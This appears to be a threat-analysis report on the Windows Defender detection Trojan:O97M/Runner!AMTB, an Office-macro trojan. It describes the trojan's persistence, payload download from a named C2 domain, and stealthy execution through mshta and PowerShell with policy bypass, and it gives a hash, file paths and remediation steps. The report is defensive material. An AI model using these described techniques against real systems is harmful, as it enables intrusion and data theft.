Trojan:O97M/Runner!AMTB - Windows Defender threat signature analysis

=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:O97M/Runner!AMTB
Classification:
Type: Trojan
Platform: O97M
Family: Runner
Detection Type: Concrete (known malware family with identified signatures)
Suffix: !AMTB
Confidence: Very High
False-Positive Risk: Low

Concrete signature match: Trojan (appears legitimate but performs malicious actions), platform O97M, family Runner.

Summary:

Trojan:O97M/Runner!AMTB is a sophisticated trojan primarily leveraging Office macros (O97M) for initial execution. It establishes persistence, downloads additional malicious payloads from remote servers (e.g., mine.fortipower.com), and functions as a data stealer. The threat employs stealthy execution techniques using mshta.exe and powershell.exe with execution policy bypass to fully compromise the system and exfiltrate sensitive information.

Severity: Critical
VDM Static Detection:
Relevant strings associated with this threat:
Known malware associated with this threat:
421f7bdc183b51435cf834c6a2841491e2a9d2246826bb56424d7c42c1632e25
Analysis last updated: 16/01/2026
Remediation Steps:
Immediately isolate the infected host. Run a full system scan and remove all associated malicious files (e.g., under \gcc and c:\kl) and registry persistence entries (e.g., HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run). Block the associated C2 domains (e.g., mine.fortipower.com) at the network perimeter and investigate for any further compromise or data exfiltration.
=== END REPORT ===